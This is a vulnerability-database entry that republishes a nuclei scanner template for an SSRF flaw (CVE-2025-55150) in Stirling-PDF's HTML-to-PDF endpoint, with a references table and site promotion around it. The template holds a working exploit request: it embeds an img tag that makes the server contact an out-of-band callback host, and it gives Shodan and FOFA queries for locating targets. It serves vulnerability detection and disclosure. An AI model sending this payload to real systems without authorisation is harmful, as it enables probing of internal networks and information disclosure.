Lucene search
K

Stirling-PDF < 1.1.0 - Server-Side Request Forgery

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 7 Views

Stirling-PDF below 1.1.0 allows SSRF in HTML to PDF conversion due to sanitizer bypass.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-55150
12 Aug 202500:48
circl
CNNVD
Stirling-PDF 代码问题漏洞
11 Aug 202500:00
cnnvd
CVE
CVE-2025-55150
11 Aug 202521:57
cve
Cvelist
CVE-2025-55150 Stirling-PDF SSRF vulnerability on /api/v1/convert/html/pdf
11 Aug 202521:57
cvelist
EUVD
EUVD-2025-24186
3 Oct 202520:07
euvd
NVD
CVE-2025-55150
11 Aug 202522:15
nvd
OSV
CVE-2025-55150 Stirling-PDF SSRF vulnerability on /api/v1/convert/html/pdf
11 Aug 202521:57
osv
Positive Technologies
PT-2025-32590
11 Aug 202500:00
ptsecurity
RedhatCVE
CVE-2025-55150
13 Aug 202522:28
redhatcve
Vulnrichment
CVE-2025-55150 Stirling-PDF SSRF vulnerability on /api/v1/convert/html/pdf
11 Aug 202521:57
vulnrichment
Rows per page
id: CVE-2025-55150

info:
  name: Stirling-PDF < 1.1.0 - Server-Side Request Forgery
  author: WeQi
  severity: high
  description: |
    Stirling-PDF < 1.1.0 contains a server side request forgery caused by bypassing the sanitizer in the /api/v1/convert/html/pdf endpoint when processing HTML to PDF conversion, letting attackers perform SSRF, exploit requires local access.
  impact: |
    Attackers can perform SSRF to access internal resources or services, potentially leading to information disclosure or further attacks.
  remediation: |
   Upgrade to version 1.1.0 or later.
  reference:
    - https://github.com/Stirling-Tools/Stirling-PDF/security/advisories/GHSA-xw8v-9mfm-g2pm
    - https://nvd.nist.gov/vuln/detail/CVE-2025-55150
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-55150
    epss-score: 0.01587
    epss-percentile: 0.7266
    cwe-id: CWE-918
  metadata:
    verified: true
    max-request: 2
    vendor: stirlingpdf
    product: stirling_pdf
    fofa-query: title="Stirling PDF"
    shodan-query: http.title:"Stirling PDF"
  tags: cve,cve2025,stirling-pdf,ssrf

variables:
  username: "{{to_lower(rand_base(6))}}"

flow: http(1) && http(2)

http:

  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "<title>Stirling PDF")'
        internal: true

  - raw:
      - |
        POST /api/v1/convert/html/pdf HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryavCUaFmKmcDEhMPU

        ------WebKitFormBoundaryavCUaFmKmcDEhMPU
        Content-Disposition: form-data; name="fileInput"; filename="{{username}}.html"
        Content-Type: text/html

        <marquee behavior='alternate' direction='right'><img src='http://{{interactsh-url}}'></marquee>
        Content-Disposition: form-data; name="zoom"

        1
        ------WebKitFormBoundaryavCUaFmKmcDEhMPU--

    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol,'dns')"
          - "contains(body,'%PDF-1.7')"
        condition: and
# digest: 4a0a0047304502201d621153aba4652f5566b81d8b6c00259bbfda317ba93085d836dea927462ae50221009698063dc5bcdf55e8ffbe5ab70640be1c279d2760385a2b9ed38faa4a9aa9ae:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Mar 2026 02:14Current
6Medium risk
Vulners AI Score6
CVSS 3.18.6 - 9.8
EPSS0.01587
SSVC
7